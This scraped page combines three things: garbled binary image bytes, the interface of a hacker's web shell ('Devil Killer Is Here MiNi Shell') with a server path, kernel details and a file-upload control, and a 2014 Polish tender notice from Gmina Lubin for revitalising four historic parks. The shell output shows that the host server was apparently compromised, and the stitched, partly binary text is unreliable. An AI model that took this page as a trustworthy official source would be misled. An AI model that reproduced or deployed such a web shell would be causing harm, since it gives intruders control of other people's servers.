JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140709/148499-N-2014.html

<p class="kh_header"><b>Lubin: Rewitalizacja szaty roślinnej parków zabytkowych Gminy Lubin, położonych w Gorzelinie, Miłoradzicach, Raszowej i Siedlcach</b><br>
<b>Numer ogłoszenia: 148499 - 2014; data zamieszczenia: 09.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubin , ul. Władysława Łokietka 6, 59-300 Lubin, woj. dolnośląskie, tel. (76) 8403100, faks (76) 8403140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ug-lubin.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja szaty roślinnej parków zabytkowych Gminy Lubin, położonych w Gorzelinie, Miłoradzicach, Raszowej i Siedlcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia - rewitalizacja szaty roślinnej wraz z utworzeniem miejsc  wypoczynku i ścieżek przyrodniczych w czterech zabytkowych parkach położonych na terenie gminy Lubin, w miejscowościach: Gorzelin, Miłoradzice, Raszowa i Siedlce.
Zakres zamówienia obejmuje w szczególności:
A. Rewitalizację parku we wsi Gorzelin (dz. nr 40/19, 39/4, 228 obręb Gorzelin), wpisanego do rejestru zabytków pod nr A/2871/666L, która obejmuje:
1) wykonanie cięć pielęgnacyjnych w koronach drzew;
2) wykonanie cięć odmładzających krzewów;
3) usunięcie 338 drzew w ramach odnowy i pielęgnacji drzew;
4) utworzenie ścieżki przyrodniczej z wyeksponowaniem roślin przyrodniczo cennych i okazałych z włączeniem elementów historycznych, w ramach której zostanie:
a)	wykonana nawierzchnia ścieżek z gruntu rodzimego o szerokości 150 cm, ze spadkami poprzecznymi i rowkami odwadniającymi, o powierzchni ogółem ok. 817,50 m2,
b)	wykonane i zamontowane oznakowanie ścieżki tj. 14 słupków przystankowych wraz z tabliczkami informacyjnymi;
5) stworzenie miejsca wypoczynku plenerowego poprzez wykoszenie wskazanej w projekcie polany parkowej o powierzchni ogółem ok. 4197 m2;
6) oczyszczenie terenu parku z samosiewów, traw, śmieci z powierzchni ogółem ok. 46505,80 m2, w tym wycięcie ok. 2000 szt. samosiewów drzew o średnicy 10-15 cm;
7) usunięcie zanieczyszczeń z terenu parku;
8) wykonanie i montaż tablicy informacyjnej wraz z opisem historyczno-przyrodniczym - 1 szt. 

B. Rewitalizację parku we wsi Miłoradzice (dz. nr 451/1, 451/2, 455 obręb Miłoradzice), wpisanego do rejestru zabytków pod nr A/2871/666L, która obejmuje:
1) wykonanie cięć pielęgnacyjnych w koronach drzew;
2) wykonanie cięć odmładzających krzewów;
3) usunięcie 57 drzew w ramach odnowy i pielęgnacji drzew;
4) utworzenie ścieżki przyrodniczej z wyeksponowaniem roślin przyrodniczo cennych i okazałych z włączeniem elementów historycznych, w ramach której zostanie:
a)	wykonana nawierzchnia ścieżek z gruntu rodzimego o szerokości 150 cm, ze spadkami poprzecznymi i rowkami odwadniającymi, o powierzchni ogółem ok. 492 m2,
b)	wykonane i zamontowane oznakowanie ścieżki, tj. słupków przystankowych wraz z tabliczkami informacyjnymi;
5) stworzenie miejsca wypoczynku plenerowego poprzez wykoszenie wskazanej w projekcie polany parkowej o powierzchni ogółem ok. 5221,70 m2;
6) oczyszczenie terenu parku z samosiewów, traw, śmieci z powierzchni ok. 24478,3 m2,
7) usunięcie zanieczyszczeń z terenu parku;
8) wykonanie i montaż tablicy informacyjnej wraz z opisem historyczno-przyrodniczym - 1 szt.

C. Rewitalizację parku we wsi Raszowa (dz. nr 215 i 204 obręb Raszowa), wpisanego do rejestru zabytków pod nr A/3310/682/L, która obejmuje:
1) wykonanie cięć pielęgnacyjnych w koronach drzew i usunięcie posuszu znajdującego się nad drogami, 
2) wykonanie cięć odmładzających krzewów, 
3) usunięcie 86 drzew w ramach odnowy i pielęgnacji drzew, 
4) utworzenie ścieżki przyrodniczej z wyeksponowaniem roślin przyrodniczo cennych i okazałych z włączeniem elementów historycznych, w ramach której zostanie:
a)	wykonana nawierzchnia ścieżek z gruntu rodzimego o szerokości 150 cm, ze spadkami poprzecznymi i rowkami odwadniającymi, o powierzchni ogółem ok. 750 m2;
b)	wykonane i zamontowane oznakowanie ścieżki, tj. 11 słupków przystankowych wraz z tabliczkami informacyjnymi;
5) stworzenie miejsca wypoczynku plenerowego poprzez wykoszenie wskazanej w projekcie polany parkowej na powierzchni ogółem ok. 2775,2 m2, 
6) oczyszczenie terenu parku z samosiewów, traw i śmieci z powierzchni ogółem ok. 25824,80 m2, w tym wycięcie ok. 1300 szt samosiewów drzew o średnicy 10-15 cm;
7) uporządkowanie terenu na wyspie i założenie trawnika,
8) usunięcie zanieczyszczeń z terenu parku;
9) wykonanie i montaż tablicy informacyjnej wraz z opisem historyczno-przyrodniczym - 1 szt. 
D. Rewitalizację parku we wsi Siedlce (dz. nr 231/1, 230/1, 405/1 obręb Siedlce) wpisanego do rejestru zabytków pod nr A/3366/474/L, która obejmuje:
1) wykonanie cięć pielęgnacyjnych w koronach drzew;
2) wykonanie cięć odmładzających krzewów;
3) usunięcie 31 drzew w ramach odnowy i pielęgnacji drzew;
4) utworzenie ścieżki przyrodniczej z wyeksponowaniem roślin przyrodniczo cennych i okazałych z włączeniem elementów historycznych, w ramach której zostanie:
a)	wykonana nawierzchnia ścieżek z gruntu rodzimego o szerokości 150 cm, ze spadkami poprzecznymi i rowkami odwadniającymi, o powierzchni ogółem ok. 381 m2,
b)	wykonane i zamontowane oznakowanie ścieżki, tj. 5 słupków przystankowych,
5) stworzenie miejsca wypoczynku plenerowego poprzez wykoszenie wskazanej w projekcie polany parkowej o powierzchni ogółem 5874,0 m2;
6) oczyszczenie terenu parku z samosiewów, traw i śmieci z powierzchni ogółem ok. 20425,8 m2, w tym wycięcie ok. 830 szt. samosiewów drzew o średnicy 10-15 cm;
7) usunięcie zanieczyszczeń z terenu parku;
8) wykonanie i montaż tablicy informacyjnej wraz z opisem historyczno-przyrodniczym - 1 szt.
Uzyskane podczas prowadzenia prac, będących przedmiotem niniejszego zamówienia, drewno z wycinki drzew, należy pociąć na odcinki nie dłuższe niż 0,5 m, ułożyć w stosy i  pozostawić do dyspozycji Zamawiającego.
Szczegółowy zakres wszystkich powyższych prac określają w szczególności: projekty rewitalizacji, w tym przedmiary robót, które mają charakter pomocniczy, postanowienia Dolnośląskiego Wojewódzkiego Konserwatora Zabytków i zgłoszenia wykonywania robót w zakresie dotyczącym posadowienia tablic i drogowskazów, załączone do niniejszej specyfikacji.
UWAGA:
Wykonawca zobowiązany będzie do wykonywania prac zgodnie z decyzjami Dolnośląskiego Wojewódzkiego Konserwatora Zabytków dotyczącymi prowadzenia prac na terenach wpisanych do rejestru zabytków, które zostaną wydane po przedłożeniu Dolnośląskiemu Wojewódzkiemu Konserwatorowi Zabytków danych osób, które będą kierować pracami wykonywanymi w ramach przedmiotu zamówienia. Planowany termin uzyskania zezwoleń to 20.08.2014 r.
	Obowiązkiem Wykonawcy jest zapoznanie się z terenem prac objętych  przedmiotem zamówienia.
	Wykonawca dostarczy we własnym zakresie i na własny koszt wszystkie materiały i urządzenia niezbędne do wykonania przedmiotu zamówienia. 
	Wytworzone podczas wykonywania prac odpady Wykonawca zobowiązany jest usunąć zaraz po wytworzeniu i zagospodarować na własny koszt zgodnie z obowiązującymi w tym zakresie przepisami. 
Wykonawca przekaże Zamawiającemu, najpóźniej w dniu podpisania umowy o zamówienie publiczne, kopie dokumentów (potwierdzone za zgodność z oryginałem) potwierdzających posiadanie przez osobę lub osoby uczestniczące w realizacji zamówienia  kwalifikacji wynikających z § 23 ust.1 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych, tj.:
- dokument lub dokumenty potwierdzające uzyskanie tytułu zawodowego magistra lub magistra inżyniera, uzyskane po ukończeniu studiów wyższych, obejmujących wiadomości w zakresie wykonywania prac konserwatorskich oraz prac restauratorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków wpisanych do rejestru zabytków albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków,
- dokument potwierdzający odbycie po ukończeniu ww. studiów co najmniej 12-miesięcznej praktyki zawodowej przy konserwacji i pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków;
Zamawiający niezwłocznie po otrzymaniu dokumentów, o których mowa powyżej, przedłoży Dolnośląskiemu Wojewódzkiemu Konserwatorowi Zabytków dane osób, które będą kierować pracami wykonywanymi w ramach przedmiotu umowy celem uzyskania zezwoleń na prowadzenie prac na terenach wpisanych do rejestru zabytków. Planowany termin uzyskania zezwoleń to 20.08.2014 r. Dopiero po uzyskaniu ww. zezwoleń Wykonawca będzie mógł rozpocząć prace związane z realizacją zadania w zakresie dotyczącym prowadzenia prac na terenie parków;
Wykonawca zobowiązany jest do umieszczenia dodatkowo na tablicach i drogowskazach informacyjnych:
-	herbu Gminy Lubin,
-     logotypów: Unii Europejskiej, PROW na lata 2007-2013, programu Leader, zgodnie z Księgą wizualizacji znaku Program Rozwoju Obszarów Wiejskich na lata 2007-2013 obowiązującą od dnia 20 lipca 2013 r. oraz zgodnie z wytycznymi zawartymi w piśmie Ministerstwa  Rolnictwa i Rozwoju Wsi z dnia 26 sierpnia 2010 r. dot. umieszczania logotypów Unii Europejskiej dla operacji współfinansowanych ze środków Programu Rozwoju Obszarów Wiejskich na lata 2007-2013; dokumenty te dostępne są na ogólnie dostępnych stronach internetowych.

Projekt jest wnioskowany do dofinansowania ze środków Unii Europejskiej w ramach działania 413, PROW na lata 2007-2013 Wdrażanie lokalnych strategii rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi. Planowany termin podpisania umowy to 10.07.2014 r.
Zamawiający zastrzega sobie możliwość unieważnienia niniejszego postępowania na podstawie art. 93 ust. 1a ustawy Prawo zamówień publicznych, jeżeli środki pochodzące z budżetu Unii Europejskiej nie zostaną mu przyznane.  
Wymagany termin realizacji zamówienia:  od dnia podpisania umowy do dnia 31.10.2014 r.
Wykonawca będzie mógł rozpocząć prace związane z realizacją zadania w zakresie dotyczącym prowadzenia prac na terenie parków dopiero po uzyskaniu przez Zamawiającego zezwoleń na prowadzenie prac na terenach wpisanych do rejestru zabytków od Dolnośląskiego Wojewódzkiego Konserwatora Zabytków. Planowany termin uzyskania zezwoleń to 20.08.2014 r. Do czasu uzyskania przez Zamawiającego w/w zezwoleń, Wykonawca zobowiązany jest do przygotowania projektów tablic i drogowskazów, z naniesionymi logotypami, celem zatwierdzenia przez Zamawiającego, a następnie ich wykonania.
Zamawiający przewiduje możliwość przedłużenia terminu umownego wykonania prac objętych umową, w sytuacji, gdy przedłużeniu ulegnie planowany termin na uzyskanie zezwoleń od  Dolnośląskiego Wojewódzkiego Konserwatora Zabytków. Termin wykonania prac zostanie wydłużony wyłącznie o ilość dni liczoną od dnia 20.08.2014 r.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 77.21.14.00-6, 77.21.13.00-5, 77.21.15.00-7, 77.31.20.00-0, 77.31.30.00-7, 90.51.11.00-3, 34.92.84.72-7, 48.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest wymagane wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usług polegających na wykonaniu lub wykonywaniu prac  w zakresie utrzymania parków lub innych zespołów zieleni (tj. związanych z wycinką drzew, pielęgnacją drzewostanów, wykaszaniem terenów zieleni) na łączną kwotę nie mniejszą niż 80 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże, że będzie dysponował, niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, tj. co najmniej :
piłą spalinową do cięcia drewna - 3 szt.,
podnośnikiem koszowym do 3,5 ton - 1 szt.,
urządzeniem do zrąbkowania - 2 szt.,
frezownicą do pni - 1 szt., 
kosiarkami ręcznymi (spalinowymi)- nie mniej niż 5 szt.,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże, że będzie dysponował, co najmniej jedną osobą posiadającą tytuł zawodowy magistra lub magistra inżyniera uzyskany po ukończeniu studiów wyższych, obejmujących wiadomości w zakresie wykonywania prac konserwatorskich oraz prac restauratorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków wpisanych do rejestru zabytków albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków, która odbyła po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków, zgodnie z § 23 ust.1 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych.
Osoba (osoby) posiadająca wskazane kwalifikacje będzie pełnić funkcję kierownika prac ze strony Wykonawcy przy realizacji niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo, w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2. Zobowiązanie podmiotów trzecich do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W treści zobowiązania należy wykazać w jaki sposób podmiot trzeci będzie udostępniał Wykonawcy swoje zasoby przy realizacji danego zamówienia. 3. Jeżeli Zamawiający na etapie badania dokumentów uzna, że Wykonawca w niewystarczający sposób udowodnił dysponowanie niezbędnymi dla należytego wykonania zamówienia zasobami podmiotów trzecich (bez względu na to czy podmioty te będą brały udział w realizacji części zamówienia), w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie i na warunkach określonych poniżej:
1. Zamawiający przewiduje możliwość zmiany umowy, w zakresie terminu realizacji zamówienia, w przypadku wystąpienia następujących okoliczności:
1) jeżeli zajdzie konieczność wydłużenia terminu wykonania prac, związanego z przedłużającym się uzyskaniem  decyzji Dolnośląskiego Wojewódzkiego Konserwatora Zabytków, o których mowa w § 1 ust. 10 wzoru umowy - termin wykonania prac zostanie wydłużony wyłącznie o ilość dni liczoną od dnia 20.08.2014 r.; 
2) wystąpienia nieprzewidzianych warunków lub zjawisk atmosferycznych (kataklizmy, klęski żywiołowe), lub okoliczności siły wyższej, rozumianej jako zewnętrzne, niezależne od woli stron zdarzenie, którego nie można było przewidzieć;
3) konieczności przeprowadzenia uzgodnień prawnych lub technicznych;
4) w przypadku wystąpienia kolizji z urządzeniami lub instalacjami;
5) wystąpienia okoliczności nie zawinionych przez strony, których nie można było wcześniej przewidzieć.
Inicjatorem każdej zmiany może być Wykonawca lub Zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej w terminie 3 dni roboczych od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana nie może spowodować zmiany wynagrodzenia Wykonawcy.                                                                                

Zamawiający dopuszcza wprowadzenie następujących zmian, nie wymagających zmiany umowy, dotyczących:
     a) zamiany osoby lub osób, o których mowa w § 9 ust. 2  wzoru umowy. Zmiana wymaga zgody Zamawiającego, przy czym osoba lub osoby te muszą spełniać wymagania określone w specyfikacji istotnych warunków zamówienia, w zakresie posiadanych uprawnień. Zmiana taka nie wymaga aneksu do umowy, a jedynie pisemnego poinformowania i uzyskania zgody Zamawiającego;
     b) dopuszcza się możliwość zmiany osób wymienionych w § 9 ust. 1 i 4 wzoru umowy, o czym niezwłocznie należy powiadomić drugą stronę w formie pisemnej. Zmiana osób wymienionych w ust. 1 i ust. 4 nie stanowi zmiany umowy i nie wymaga aneksu do umowy.

